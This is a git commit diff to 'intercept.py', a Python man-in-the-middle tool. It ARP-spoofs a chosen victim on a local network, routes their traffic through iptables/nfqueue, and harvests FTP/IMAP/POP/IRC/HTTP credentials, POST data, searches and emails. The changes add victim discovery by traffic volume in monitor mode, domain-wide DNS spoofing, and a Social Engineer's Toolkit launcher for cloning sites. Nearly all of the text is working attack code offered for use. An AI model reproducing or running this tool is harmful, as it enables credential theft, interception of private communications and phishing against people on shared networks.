nmap scanning and bug fixes

2025-07-10 07:13:44 -07:00 · 2013-10-31 15:00:34 -06:00 · 2013-10-31 15:00:34 -06:00 · 364082c330
commit 364082c330
parent 8c09a80019
2 changed files with 229 additions and 99 deletions
--- a/README.md
+++ b/README.md
@ -3,36 +3,37 @@ intercept
 Individually arpspoofs the target box, router and DNS server if necessary. Displays all most the interesting bits of their traffic. Cleans up after itself. 
-Example usage:
+Example usage as root:
-python intercept.py -u -p -d -w -ip 192.168.0.10
+python intercept.py -u -p -d -ip 192.168.0.10
 Output: 
 -u, URLs visited; truncates at 150 characters and filters image urls since they spam the output 
-p, username/passwords for FTP/IMAP/POP/IRC/HTTP, POSTs made, all searches made 
+-p, username/passwords for FTP/IMAP/POP/IRC/HTTP, POSTs made, all searches made, and incoming/outgoing email and IRC messages sent
 -d, see all images they view with driftnet
 -w, writes the output to the running directory in intercept.log.txt
 -ip, target this IP address 
-Running just intercept.py without -ip argument will arp scan the network and give you a choice of targets although my wifi-monitor.py script additionally shows data usage on the LAN allowing you to pick the most active target.
+Running just intercept.py without -ip argument will display all the machines on the network and show how many data packets they're sending. This is highly dependant on your wireless card and your proximity to the other machines for the data packet accuracy. 
 All options:
 python intercept.py -h
 -s, strip SSL from sites with SSLstrip
 -v, show verbose URLs which do not truncate at 150 characters like -u
 -i INTERFACE, specify interface; default is first interface in `ip route`, eg: -i wlan0
-dns DOMAIN, DNS spoofing; race condition with router, will fix eventually, eg: -dns google.com
+-dns DOMAIN, spoof the DNS of DOMAIN. e.g. -dns facebook.com will DNS spoof every DNS request to facebook.com or subdomain.facebook.com
 -n, performs a quick nmap scan of the target
 -na, performs an aggressive nmap scan in the background and outputs to [victim IP address].nmap.txt
 Cleans the following on Ctrl-C:
@ -45,12 +46,5 @@ Cleans the following on Ctrl-C:
 To do:
  integrate https://github.com/DanMcInerney/wifi-monitor
-  change packet input from scapy to iptables' nfqueue like https://github.com/DanMcInerney/dnsspoof
+Add ability to read from pcap file
  integrate this project with wifite?
  use twisted so we can use nfqueue as pkt input
  add ability to read from pcap
--- a/intercept.py
+++ b/intercept.py
@ -1,10 +1,22 @@
 #!/usr/bin/python
 '''
-ADD wifi-monitor TO IT IF NO -ip OPTION EXISTS
+Description:	MITMs another LAN client and prints all the interesting unencrypted info like passwords and messages. Asynchronous multithreaded arp spoofing packet parser.
 Author:			Dan McInerney
 Contact:		danhmcinerney gmail
 Prerequisites:	Linux
 					nmap (optional)
 					nbtscan (optional)
 					aircrack-ng
 				Python 2.6+
 					nfqueue-bindings
 					scapy
 					twisted
 Note: 			This script flushes iptables before and after usage.
 '''
 #from logging import getLogger
 import logging
 logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
 from scapy.all import *
@ -28,10 +40,12 @@ parser = argparse.ArgumentParser()
 parser.add_argument("-u", "--urlspy", help="Show all URLs the victim is browsing minus URLs that end in .jpg, .png, .gif, .css, and .js to make the output much friendlier. Also truncates URLs at 150 characters. Use -v to print all URLs and without truncation.", action="store_true")
 parser.add_argument("-ip", "--ipaddress", help="Enter IP address of victim and skip the arp ping at the beginning which would give you a list of possible targets.")
 parser.add_argument("-d", "--driftnet", help="Open an xterm window with driftnet.", action="store_true")
 parser.add_argument("-s", "--sslstrip", help="Open an xterm window with sslstrip.", action="store_true")
 parser.add_argument("-v", "--verboseURL", help="Shows all URLs the victim visits but doesn't limit the URL to 150 characters like -u does.", action="store_true")
-parser.add_argument("-dns", "--dnsspoof", help="Spoof DNS responses of a specific domain. Enter domain after this argument.")
+parser.add_argument("-dns", "--dnsspoof", help="Spoof DNS responses of a specific domain. Enter domain after this argument. An argument like [facebook.com] will match all subdomains of facebook.com")
-parser.add_argument("-p", "--post", help="Print unsecured HTTP POST loads, IMAP/POP/FTP/IRC/HTTP usernames/passwords and incoming/outgoing emails. Will also decode base64 encrypted POP/IMAP passwords for you.", action="store_true")
+parser.add_argument("-set", "--setoolkit", help="Start Social Engineer's Toolkit in another window.", action="store_true")
 parser.add_argument("-p", "--post", help="Print unsecured HTTP POST loads, IMAP/POP/FTP/IRC/HTTP usernames/passwords and incoming/outgoing emails. Will also decode base64 encrypted POP/IMAP username/password combos for you.", action="store_true")
 parser.add_argument("-na", "--nmapaggressive", help="Aggressively scan the target for open ports and services in the background. Output to ip.add.re.ss.log.txt where ip.add.re.ss is the victim's IP.", action="store_true")
 parser.add_argument("-n", "--nmap", help="Scan the target for open ports prior to starting to sniffing their packets.", action="store_true")
 parser.add_argument("-i", "--interface", help="Choose the interface to use. Default is the first one that shows up in `ip route`.")
 args = parser.parse_args()
@ -106,7 +120,7 @@ class Parser():
 						self.ftp(load, IP_dst, IP_src)
 					if dport == 80 or sport == 80:
 						self.URL(load, ack, dport, sport)
-		if args.dnsspoof or args.dnsspoofall:
+		if args.dnsspoof:
 			if pkt.haslayer(DNSQR):
 				dport = pkt[UDP].dport
 				sport = pkt[UDP].sport
@ -153,7 +167,6 @@ class Parser():
 			headers = load
 			body = ''
 		# Split the packet between headers and body and grab the URL from the headers
 		# If you see any other login/pw variable names, tell me and I'll add em in here
 		# As it stands now this has a moderately high false positive rate; I figured better to err on the site of more data than less
 		# email, user, username, name, login, log, loginID
@ -196,14 +209,17 @@ class Parser():
 				logger.write('[*] '+url+'\n')
 			# Catch search terms
-			# As it stands now this has a moderately high false positive rate mostly due to the very simple ?s= and ?q= vars
+			# As it stands now this has a moderately high false positive rate mostly due to the common ?s= and ?q= vars
 			# I figured better to err on the site of more data than less and it's easy to tell the false positives from the real searches
-			# search, query, search?q, ?s, &q, ?q, search?p, keywords, command
+			# search, query, search?q, ?s, &q, ?q, search?p, searchTerm, keywords, command
-			searched = re.search('((search|query|search\?q|\?s|&q|\?q|search\?p|keywords|command)=([^&][^&]*))', url)
+			searched = re.search('((search|query|search\?q|\?s|&q|\?q|search\?p|search[Tt]erm|keywords|command)=([^&][^&]*))', url)
 			if searched:
 				searched = searched.group(3)
 				# Common false positives
 				if 'select%20*%20from' in searched:
 					pass
 				if host == 'geo.yahoo.com':
 					pass
 				else:
 					searched = searched.replace('+', ' ').replace('%20', ' ').replace('%3F', '?').replace('%27', '\'').replace('%40', '@').replace('%24', '$').replace('%3A', ':').replace('%3D', '=').replace('%22', '\"').replace('%24', '$')
 					print T+'[+] Searched '+W+host+T+': '+searched+W
@ -405,7 +421,7 @@ class Parser():
 				for x in email_headers:
 					if x in l:
 						self.OheadersFound.append(l)
-			# if date, from, to in headers then print the message
+			# if date, from, to, in headers then print the message
 			if len(self.OheadersFound) > 3 and body != '':
 				if self.mailfragged == 1:
 					print O+'[!] OUTGOING MESSAGE (fragmented)'+W
@ -487,7 +503,7 @@ class Queued(object):
 		self.q.set_queue_maxlen(5000)
 		reactor.addReader(self)
 		self.q.set_mode(nfqueue.NFQNL_COPY_PACKET)
-		print '[*] Queue started; waiting for data\n'
+		print '[*] Flushed firewall and forwarded traffic to the queue; waiting for data'
 	def fileno(self):
 		return self.q.get_fd()
 	def doRead(self):
@ -497,72 +513,181 @@ class Queued(object):
 	def logPrefix(self):
 		return 'queued'
-class Threads():
+class active_users():
-	def sslstrip(self, DN):
+	IPandMAC = []
-		print 'Redirecting traffic to port 10000 and starting sslstrip\n'
+	start_time = time.time()
-		os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000')
+	current_time = 0
-		xterm = ['xterm', '-e', 'sslstrip', '-f', '-w', 'sslstrip.txt']
+	monmode = ''
 		Popen(xterm, stdout=PIPE, stderr=DN)
-	def driftnet(self, interface, DN):
+	def pkt_cb(self, pkt):
-		xterm = ['xterm', '-e', 'driftnet', '-i', '%s' % interface]
+		if pkt.haslayer(Dot11):
-		Popen(xterm, stdout=PIPE, stderr=DN)
+			pkt = pkt[Dot11]
 			if pkt.type == 2:
 				addresses = [pkt.addr1.upper(), pkt.addr2.upper(), pkt.addr3.upper()]
 				for x in addresses:
 					for y in self.IPandMAC:
 						if x in y[1]:
 							y[2] = y[2]+1
 				self.current_time = time.time()
 			if self.current_time > self.start_time+1:
 				self.IPandMAC.sort(key=lambda x: float(x[2]), reverse=True) # sort by data packets
 				os.system('/usr/bin/clear')
 				print '    IP	        Data'
 				for x in self.IPandMAC:
 					if len(x) == 3:
 						ip = x[0].ljust(10)
 						data = str(x[2]).rjust(8)
 						print ip, data
 					else:
 						ip = x[0].ljust(10)
 						data = str(x[2]).rjust(8)
 						print ip, data, x[3]
 				print '\n[*] Hit Ctrl-C at any time to stop and choose a victim IP'
 				self.start_time = time.time()
-	def start_threads(self, interface, DN):
+	def users(self, IPprefix, routerIP, DN):
-		#start twisted reactor in thread
+		print '[*] Running ARP scan to identify users on the network; this may take a minute...'
-		rt = Thread(target=reactor.run, args=(False,)) #reactor must be started without signal handling since it's not in the main thread
+		iplist = []
-		rt.daemon = True
+		maclist = []
-		rt.start()
+		try:
 			nmap = Popen(['/usr/bin/nmap', '-sn', IPprefix], stdout=PIPE, stderr=DN)
 			nmap = nmap.communicate()[0]
 			nmap = nmap.splitlines()[2:-1]
 		except:
 			print '[-] Nmap ARP scan failed, is it nmap installed?'
 		for x in nmap:
 			if 'Nmap' in x:
 				nmapip = x.split()[4]
 				iplist.append(nmapip)
 			if 'MAC' in x:
 				nmapmac = x.split()[2]
 				maclist.append(nmapmac)
 		zipped = zip(iplist, maclist)
 		self.IPandMAC = [list(item) for item in zipped]
 		# Make sure router is caught in the arp ping
 		r = 0
 		for i in self.IPandMAC:
 			i.append(0)
 			if r == 0:
 				if routerIP == i[0]:
 					i.append('router')
 					routerMAC = i[1]
 					r = 1
 		if r == 0:
 			exit('[-] Router MAC not found. Exiting.')
 		# Do nbtscan for windows netbios names
 		print '[*] Running nbtscan to get Windows netbios names'
 		try:
 			nbt = Popen(['nbtscan', IPprefix], stdout=PIPE, stderr=DN)
 			nbt = nbt.communicate()[0]
 			nbt = nbt.splitlines()
 			nbt = nbt[4:]
 		except:
 			print '[-] nbtscan error, are you sure it is installed?'
 		for l in nbt:
 			try:
 				l = l.split()
 				nbtip = l[0]
 				nbtname = l[1]
 			except:
 				print '[-] Could not find any netbios names. Continuing without them'
 			if nbtip and nbtname:
 				for a in self.IPandMAC:
 					if nbtip in a[0]:
 						a.append(nbtname)
 		# Start monitor mode
 		print '[*] Enabling monitor mode'
 		try:
 			promiscSearch = Popen(['/usr/sbin/airmon-ng', 'start', '%s' % interface], stdout=PIPE, stderr=DN)
 			promisc = promiscSearch.communicate()[0]
 			monmodeSearch = re.search('monitor mode enabled on (.+)\)', promisc)
 			self.monmode = monmodeSearch.group(1)
 		except OSError, e:
 			exit('[-] Enabling monitor mode failed, do you have aircrack-ng installed?')
 		sniff(iface=self.monmode, prn=self.pkt_cb, store=0)
 		if args.driftnet:
 			dr = Thread(target=self.driftnet, args=(interface, DN))
 			dr.daemon = True
 			dr.start()
 		if args.sslstrip:
 			ssl = Thread(target=self.sslstrip, args=(DN,))
 			ssl.daemon = True
 			ssl.start()
 #Print all the variables
-def print_vars(interface, DHCPsrvr, dnsIP, local_domain, routerIP, victimIP):
+def print_vars(DHCPsrvr, dnsIP, local_domain, routerIP, victimIP):
 	print "[*] Active interface: " + interface
 	print "[*] DHCP server: " + DHCPsrvr
 	print "[*] DNS server: " + dnsIP
 	print "[*] Local domain: " + local_domain
 	print "[*] Router IP: " + routerIP
-	print "[*] victim IP: " + victimIP
+	print "[*] Victim IP: " + victimIP
 	logger.write("[*] Router IP: " + routerIP+'\n')
 	logger.write("[*] victim IP: " + victimIP+'\n')
 #Enable IP forwarding and flush possibly conflicting iptables rules
 def setup(DN, victimMAC):
-	ipfwd = Popen(['cat', '/proc/sys/net/ipv4/ip_forward'], stdout=PIPE, stderr=DN)
+	ipfwd = Popen(['/bin/cat', '/proc/sys/net/ipv4/ip_forward'], stdout=PIPE, stderr=DN)
 	if ipfwd.communicate()[0] != '1\n':
 		ipf = open('/proc/sys/net/ipv4/ip_forward', 'r+')
 		ipf.write('1\n')
 		ipf.close()
 		print '[*] Enabled IP forwarding'
-	os.system('iptables -F')
+	os.system('/sbin/iptables -F')
-	os.system('iptables -X')
+	os.system('/sbin/iptables -X')
-	os.system('iptables -t nat -F')
+	os.system('/sbin/iptables -t nat -F')
-	os.system('iptables -t nat -X')
+	os.system('/sbin/iptables -t nat -X')
 	print '[*] Flushed the firewall'
 	# PREROUTING is a rule that will be needed to be added when code injection is added to this script
 #	os.system('iptables -t nat -A PREROUTING -p tcp -s %s -j NFQUEUE' % victimIP)
 #	os.system('iptables -t nat -A PREROUTING -p tcp -d %s -j NFQUEUE' % victimIP)
 	# Just throw packets that are from and to the victim into the reactor
-	os.system('iptables -A FORWARD -p tcp -s %s -m multiport --dports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP)
+	os.system('/sbin/iptables -A FORWARD -p tcp -s %s -m multiport --dports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP)
-	os.system('iptables -A FORWARD -p tcp -d %s -m multiport --dports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP)
+	os.system('/sbin/iptables -A FORWARD -p tcp -d %s -m multiport --dports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP)
-	os.system('iptables -A FORWARD -p tcp -s %s -m multiport --sports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP)
+	os.system('/sbin/iptables -A FORWARD -p tcp -s %s -m multiport --sports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP)
-	os.system('iptables -A FORWARD -p tcp -d %s -m multiport --sports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP)
+	os.system('/sbin/iptables -A FORWARD -p tcp -d %s -m multiport --sports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP)
 	# To catch DNS packets you gotta do prerouting rather than forward for some reason?
-	os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE')
+	os.system('/sbin/iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE')
-	print '[*] Forwarded traffic to the queue'
+
 # Start threads
 def threads():
 	rt = Thread(target=reactor.run, args=(False,)) #reactor must be started without signal handling since it's not in the main thread
 	rt.daemon = True
 	rt.start()
 	if args.driftnet:
 		dr = Thread(target=os.system, args=('/usr/bin/xterm -e /usr/bin/driftnet -i '+interface+' >/dev/null 2>&1',))
 		dr.daemon = True
 		dr.start()
 	if args.dnsspoof and not args.setoolkit:
 		setoolkit = raw_input('[*] You are DNS spoofing '+args.dnsspoof+', would you like to start the Social Engineer\'s Toolkit for easy exploitation? [y/n]: ')
 		if setoolkit == 'y':
 			print '[*] Starting SEtoolkit. To clone '+args.dnsspoof+' hit options 1, 2, 3, 2, then enter '+args.dnsspoof
 			try:
 				se = Thread(target=os.system, args=('/usr/bin/xterm -e /usr/bin/setoolkit >/dev/null 2>&1',))
 				se.daemon = True
 				se.start()
 			except:
 				print '[-] Could not open SEToolkit, is it installed? Continuing as normal without it.'
 	if args.nmapaggressive:
 		print '[*] Starting '+R+'aggressive scan [nmap -T4 -A -v -Pn -oN '+victimIP+W+'] in background; results will be in a file '+victimIP+'.nmap.txt'
 		try:
 			n = Thread(target=os.system, args=('nmap -T4 -A -v -Pn -oN '+victimIP+'.nmap.txt '+victimIP+' >/dev/null 2>&1',))
 			n.daemon = True
 			n.start()
 		except:
 			print '[-] Aggressive Nmap scan failed, is nmap installed?'
 	if args.setoolkit:
 		print '[*] Starting SEtoolkit'
 		try:
 			se = Thread(target=os.system, args=('/usr/bin/xterm -e /usr/bin/setoolkit >/dev/null 2>&1',))
 			se.daemon = True
 			se.start()
 		except:
 			print '[-] Could not open SEToolkit, continuing without it.'
 def main():
-	global victimIP
+	global victimIP, interface
 	#Check if root
 	if not geteuid()==0:
@ -570,26 +695,25 @@ def main():
 	DN = open(devnull, 'w')
 	if args.ipaddress:
 		victimIP = args.ipaddress
 	else:
 		ans,unans = arping(IPprefix+'*')
 		for s,r in ans:
 			ips = r.sprintf("%ARP.hwsrc% %ARP.psrc%")
 			print ips
 		victimIP = raw_input('\nType victim\'s IP: ')
 		print ''
 	#Find the gateway and interface
-	ipr = Popen(['ip', 'route'], stdout=PIPE, stderr=DN)
+	ipr = Popen(['/sbin/ip', 'route'], stdout=PIPE, stderr=DN)
 	ipr = ipr.communicate()[0]
-	routerRE = re.search('default via ((\d{2,3}\.\d{1,3}\.\d{1,4}\.)\d{1,3}) \w+ (\w[a-zA-Z0-9]\w[a-zA-Z0-9][0-9]?)', ipr)
+	ipr = repr(ipr).split(' ')
-	routerIP = routerRE.group(1)
+	routerIP = ipr[2]
-	IPprefix = routerRE.group(2)
+	IPprefix = ipr[8][2:]
 	if args.interface:
 		interface = args.interface
 	else:
-		interface = routerRE.group(3)
+		interface = ipr[4]
 	if args.ipaddress:
 		victimIP = args.ipaddress
 	else:
 		au = active_users()
 		au.users(IPprefix, routerIP, DN)
 		print '\n[*] Turning off monitor mode'
 		os.system('/usr/sbin/airmon-ng stop %s >/dev/null 2>&1' % au.monmode)
 		victimIP = raw_input('[*] Enter the non-router IP to spoof: ')
 	print "[*] Checking the DHCP and DNS server addresses..."
 	# DHCP is a pain in the ass to craft
@ -618,38 +742,50 @@ def main():
 				if 'name_server' in x:
 					dnsIP = x[1]
 	else:
-		print "[!] No answer to DHCP packet sent to find the DNS server. Setting DNS and DHCP server to router IP."
+		print "[-] No answer to DHCP packet sent to find the DNS server. Setting DNS and DHCP server to router IP."
 		dnsIP = routerIP
 		DHCPsrvr = routerIP
 		local_domain = 'None'
 	# Print the vars
-	print_vars(interface, DHCPsrvr, dnsIP, local_domain, routerIP, victimIP)
+	print_vars(DHCPsrvr, dnsIP, local_domain, routerIP, victimIP)
 	try:
 		routerMAC = Spoof().originalMAC(routerIP)
 		print "[*] Router MAC: " + routerMAC
 		logger.write("[*] Router MAC: "+routerMAC+'\n')
 	except:
-		exit("[!] Could not get router MAC address")
+		exit("[-] Could not get router MAC address")
 	try:
 		victimMAC = Spoof().originalMAC(victimIP)
 		print "[*] Victim MAC: " + victimMAC
 		logger.write("[*] Victim MAC: "+routerMAC+'\n')
 	except:
-		exit("[!] Could not get victim MAC address")
+		exit("[-] Could not get victim MAC address")
 	if dnsIP != routerIP:
 		try:
 			dnsMAC = Spoof().originalMAC(dnsIP)
 			print "[*] DNS server MAC: " + dnsMAC
 		except:
-			print "[!] Could not get DNS server MAC address"
+			print "[-] Could not get DNS server MAC address"
 	if dnsIP == routerIP:
 		dnsMAC = routerMAC
 	setup(DN, victimMAC)
 	Queued()
-	th = Threads()
+	threads()
-	th.start_threads(interface, DN)
+
 	if args.nmap:
 		print "\n[*] Running [nmap -T4 -O "+victimIP+"]"
 		try:
 			nmap = Popen(['/usr/bin/nmap', '-T4', '-O', victimIP], stdout=PIPE, stderr=DN)
 			nmap = nmap.communicate()[0]
 			nmap = nmap.splitlines()[3:-4]
 		except:
 			print '[-] Nmap port and OS scan failed, is it installed?'
 		for x in nmap:
 			print '[+]',x
 			logger.write('[+] '+x+'\n')
 	print ''
 	# Cleans up if Ctrl-C is caught
 	def signal_handler(signal, frame):
@ -661,10 +797,10 @@ def main():
 		if not dnsIP == routerIP:
 			Spoof().restore(routerIP, dnsIP, routerMAC, dnsMAC)
 			Spoof().restore(routerIP, dnsIP, routerMAC, dnsMAC)
-		os.system('iptables -F')
+		os.system('/sbin/iptables -F')
-		os.system('iptables -X')
+		os.system('/sbin/iptables -X')
-		os.system('iptables -t nat -F')
+		os.system('/sbin/iptables -t nat -F')
-		os.system('iptables -t nat -X')
+		os.system('/sbin/iptables -t nat -X')
 		Spoof().restore(routerIP, victimIP, routerMAC, victimMAC)
 		Spoof().restore(routerIP, victimIP, routerMAC, victimMAC)
 		exit(0)